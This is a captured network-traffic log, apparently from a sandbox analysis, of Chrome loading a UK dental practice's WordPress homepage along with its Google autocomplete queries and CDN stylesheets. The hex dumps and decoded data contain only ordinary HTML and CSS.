                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      40192.168.2.1649756142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:23 UTC679OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop.c&oit=3&cp=26&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      41192.168.2.1649757142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:24 UTC682OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop.co.u&oit=3&cp=29&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      42192.168.2.1649758142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:24 UTC683OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop.co.uk&oit=3&cp=30&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      43192.168.2.164976291.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:25 UTC665OUTGET / HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:25 UTC578INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                      x-pingback: https://dentalhealthstop.co.uk/xmlrpc.php
                                                                                                                                      link: <https://dentalhealthstop.co.uk/wp-json/>; rel="https://api.w.org/"
                                                                                                                                      link: <https://dentalhealthstop.co.uk/>; rel=shortlink
                                                                                                                                      etag: "2278-1713920612;;;"
                                                                                                                                      x-litespeed-cache: hit
                                                                                                                                      transfer-encoding: chunked
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:25 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:25 UTC790INData Raw: 34 63 34 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 48 53 20 44 65 6e 74 69 73 74 20 61 6e 64 20 4d 6f 64 65 72 6e 20 44 65 6e 74 61 6c 20 50 72 61 63 74 69 63 65 20 69 6e 20 57 6f 6c 76
                                                                                                                                      Data Ascii: 4c45<!DOCTYPE html><html lang="en"> <head> ... Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>NHS Dentist and Modern Dental Practice in Wolv
                                                                                                                                      2024-04-24 10:13:26 UTC14994INData Raw: 2f 6c 69 62 73 2f 63 6f 6f 6b 69 65 63 6f 6e 73 65 6e 74 32 2f 33 2e 30 2e 33 2f 63 6f 6f 6b 69 65 63 6f 6e 73 65 6e 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 09 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 77 69 6e 64 6f 77 2e 63 6f 6f 6b 69 65 63 6f 6e 73 65 6e 74 2e 69 6e 69 74 69 61 6c 69 73 65 28 7b 0a 09 20 20 22 70 61 6c 65 74 74 65 22 3a 20 7b 0a 09 09 22 70 6f 70 75 70 22 3a 20 7b 0a 09 09 20 20 22 62 61 63 6b 67 72 6f 75 6e 64 22 3a 20 22 23 30 30 30 30 30 30 22 0a 09 09 7d 2c 0a 09 09 22 62 75 74 74 6f 6e 22 3a 20 7b 0a 09 09 20 20 22 62 61 63 6b 67 72 6f 75 6e 64 22 3a 20 22 23 37 65 36 63 66 66 22 2c 0a 09
                                                                                                                                      Data Ascii: /libs/cookieconsent2/3.0.3/cookieconsent.min.js"></script><script>window.addEventListener("load", function(){window.cookieconsent.initialise({ "palette": {"popup": { "background": "#000000"},"button": { "background": "#7e6cff",
                                                                                                                                      2024-04-24 10:13:26 UTC3749INData Raw: 70 72 6f 76 65 6e 20 74 65 63 68 6e 6f 6c 6f 67 79 20 74 6f 20 61 63 68 69 65 76 65 20 74 68 65 20 62 65 73 74 20 70 6f 73 73 69 62 6c 65 20 6f 75 74 63 6f 6d 65 73 20 66 6f 72 20 6f 75 72 20 70 61 74 69 65 6e 74 73 2e 20 43 6f 6e 74 69 6e 75 65 64 20 69 6e 76 65 73 74 6d 65 6e 74 20 69 6e 20 74 68 65 20 50 72 61 63 74 69 63 65 20 69 73 20 6f 62 76 69 6f 75 73 20 66 6f 72 20 61 6c 6c 20 74 6f 20 73 65 65 2e 3c 2f 70 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 72 65 61 73 6f 6e 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 32 22 3e 0a 09 09 09 3c 69 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6e 74 61 6c 68 65 61 6c 74 68 73 74 6f 70 2e
                                                                                                                                      Data Ascii: proven technology to achieve the best possible outcomes for our patients. Continued investment in the Practice is obvious for all to see.</p></div></div><div class="row reason"><div class="col-lg-2"><i><img src="https://dentalhealthstop.
                                                                                                                                      2024-04-24 10:13:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      44192.168.2.1649763104.17.25.144437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:26 UTC592OUTGET /ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css HTTP/1.1
                                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:26 UTC944INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:26 GMT
                                                                                                                                      Content-Type: text/css; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                                      ETag: W/"5eb03e2d-f62"
                                                                                                                                      Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 61428
                                                                                                                                      Expires: Mon, 14 Apr 2025 10:13:26 GMT
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d60bBsuzTcMnrWgEOyhgMx5QjI5LsCbMbS8yAhRHFIkm3fEasoh5NZLjso7cD5RBr%2BFaLZviSvNbTjp6L%2FTM94dupW3p%2BIz5ff8Hv8YjweJCZEMrcrnW%2BfE1wVkOygTn3K4UqAKt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8795521a799c0ad1-LAS
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 10:13:26 UTC425INData Raw: 66 36 32 0d 0a 2e 63 63 2d 77 69 6e 64 6f 77 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 31 73 20 65 61 73 65 7d 2e 63 63 2d 77 69 6e 64 6f 77 2e 63 63 2d 69 6e 76 69 73 69 62 6c 65 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 63 63 2d 61 6e 69 6d 61 74 65 2e 63 63 2d 72 65 76 6f 6b 65 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 31 73 20 65 61 73 65 7d 2e 63 63 2d 61 6e 69 6d 61 74 65 2e 63 63 2d 72 65 76 6f 6b 65 2e 63 63 2d 74 6f 70 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 32 65 6d 29 7d 2e 63 63 2d 61 6e 69 6d 61 74 65 2e 63 63 2d 72 65 76 6f 6b 65 2e 63 63 2d 62 6f 74 74 6f 6d 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 32 65 6d 29 7d 2e 63 63
                                                                                                                                      Data Ascii: f62.cc-window{opacity:1;transition:opacity 1s ease}.cc-window.cc-invisible{opacity:0}.cc-animate.cc-revoke{transition:transform 1s ease}.cc-animate.cc-revoke.cc-top{transform:translateY(-2em)}.cc-animate.cc-revoke.cc-bottom{transform:translateY(2em)}.cc
                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 6d 61 78 2d 68 65 69 67 68 74 20 31 73 7d 0a 2e 63 63 2d 6c 69 6e 6b 2c 2e 63 63 2d 72 65 76 6f 6b 65 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 63 63 2d 72 65 76 6f 6b 65 2c 2e 63 63 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 2c 43 61 6c 69 62 72 69 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 65 6d 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b
                                                                                                                                      Data Ascii: max-height 1s}.cc-link,.cc-revoke:hover{text-decoration:underline}.cc-revoke,.cc-window{position:fixed;overflow:hidden;box-sizing:border-box;font-family:Helvetica,userbri,Arial,sans-serif;font-size:16px;line-height:1.5em;display:-ms-flexbox;display:flex;
                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 35 65 6d 7d 2e 63 63 2d 72 65 76 6f 6b 65 2e 63 63 2d 62 6f 74 74 6f 6d 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 33 65 6d 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 35 65 6d 7d 2e 63 63 2d 72 65 76 6f 6b 65 2e 63 63 2d 6c 65 66 74 7b 6c 65 66 74 3a 33 65 6d 3b 72 69 67 68 74 3a 75 6e 73 65 74 7d 2e 63 63 2d 72 65 76 6f 6b 65 2e 63 63 2d 72 69 67 68 74 7b 72 69 67 68 74 3a 33 65 6d 3b 6c 65 66 74 3a 75 6e 73 65 74 7d 2e 63 63 2d 74 6f 70 7b 74 6f 70 3a
                                                                                                                                      Data Ascii: em;border-bottom-left-radius:.5em;border-bottom-right-radius:.5em}.cc-revoke.cc-bottom{bottom:0;left:3em;border-top-left-radius:.5em;border-top-right-radius:.5em}.cc-revoke.cc-left{left:3em;right:unset}.cc-revoke.cc-right{right:3em;left:unset}.cc-top{top:
                                                                                                                                      2024-04-24 10:13:26 UTC782INData Raw: 6e 64 6f 77 2e 63 63 2d 66 6c 6f 61 74 69 6e 67 7b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 7d 2e 63 63 2d 77 69 6e 64 6f 77 20 2e 63 63 2d 6d 65 73 73 61 67 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 7d 2e 63 63 2d 77 69 6e 64 6f 77 2e 63 63 2d 62 61 6e 6e 65 72 7b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 75 6e 73 65 74 7d 7d 0a 2e 63 63 2d 66 6c 6f 61 74 69 6e 67 2e 63 63 2d 74 68 65 6d 65 2d 63 6c 61 73 73 69 63 7b 70 61 64 64 69 6e 67 3a 31 2e 32 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 7d 2e 63 63 2d 66 6c 6f 61 74 69 6e 67 2e 63 63 2d 74 79 70 65 2d 69 6e 66 6f 2e 63 63 2d 74 68 65 6d 65 2d 63 6c 61 73 73 69 63 20 2e 63 63 2d 63 6f 6d 70 6c 69 61 6e 63 65 7b
                                                                                                                                      Data Ascii: ndow.cc-floating{max-width:none}.cc-window .cc-message{margin-bottom:1em}.cc-window.cc-banner{-ms-flex-align:unset;align-items:unset}}.cc-floating.cc-theme-classic{padding:1.2em;border-radius:5px}.cc-floating.cc-type-info.cc-theme-classic .cc-compliance{
                                                                                                                                      2024-04-24 10:13:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      45192.168.2.1649764104.18.11.2074437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:26 UTC622OUTGET /bootstrap/4.0.0-beta/css/bootstrap.min.css HTTP/1.1
                                                                                                                                      Host: maxcdn.bootstrapcdn.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://dentalhealthstop.co.uk
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:26 UTC919INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:26 GMT
                                                                                                                                      Content-Type: text/css; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      CDN-PullZone: 252412
                                                                                                                                      CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                      CDN-RequestCountryCode: US
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Cache-Control: public, max-age=31919000
                                                                                                                                      ETag: W/"3ffbab350748e841d3768b5d1ca48933"
                                                                                                                                      Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                      CDN-CachedAt: 03/18/2024 12:47:31
                                                                                                                                      CDN-ProxyVer: 1.04
                                                                                                                                      CDN-RequestPullCode: 200
                                                                                                                                      CDN-RequestPullSuccess: True
                                                                                                                                      CDN-EdgeStorageId: 1002
                                                                                                                                      timing-allow-origin: *
                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      CDN-Status: 200
                                                                                                                                      CDN-RequestId: 826d3eb220c8c4c1e39fc8e748b7526c
                                                                                                                                      CDN-Cache: HIT
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8795521a8ad809f5-LAS
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 10:13:26 UTC450INData Raw: 37 63 31 63 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 2d 62 65 74 61 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 37 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 37 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 2a 2c 3a 3a 61 66 74 65 72 2c 3a 3a 62 65 66 6f 72
                                                                                                                                      Data Ascii: 7c1c/*! * Bootstrap v4.0.0-beta (https://getbootstrap.com) * Copyright 2011-2017 The Bootstrap Authors * Copyright 2011-2017 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */@media print{*,::after,::befor
                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 3b 70 61 67 65 2d 62 72 65 61 6b 2d 69 6e 73 69 64 65 3a 61 76 6f 69 64 7d 74 68 65 61 64 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 68 65 61 64 65 72 2d 67 72 6f 75 70 7d 69 6d 67 2c 74 72 7b 70 61 67 65 2d 62 72 65 61 6b 2d 69 6e 73 69 64 65 3a 61 76 6f 69 64 7d 68 32 2c 68 33 2c 70 7b 6f 72 70 68 61 6e 73 3a 33 3b 77 69 64 6f 77 73 3a 33 7d 68 32 2c 68 33 7b 70 61 67 65 2d 62 72 65 61 6b 2d 61 66 74 65 72 3a 61 76 6f 69 64 7d 2e 6e 61 76 62 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 62 61 64 67 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 30 7d 2e 74 61 62 6c 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e
                                                                                                                                      Data Ascii: er:1px solid #999;page-break-inside:avoid}thead{display:table-header-group}img,tr{page-break-inside:avoid}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}.badge{border:1px solid #000}.table{border-collapse:collapse!important}.
                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 64 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 72 65 6d 7d 64 66 6e 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 7d 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 7d 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 30 25 7d 73 75 62 2c 73 75 70 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 37 35 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 76
                                                                                                                                      Data Ascii: m:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;v
                                                                                                                                      2024-04-24 10:13:26 UTC1369INData Raw: 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c
                                                                                                                                      Data Ascii: e-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,
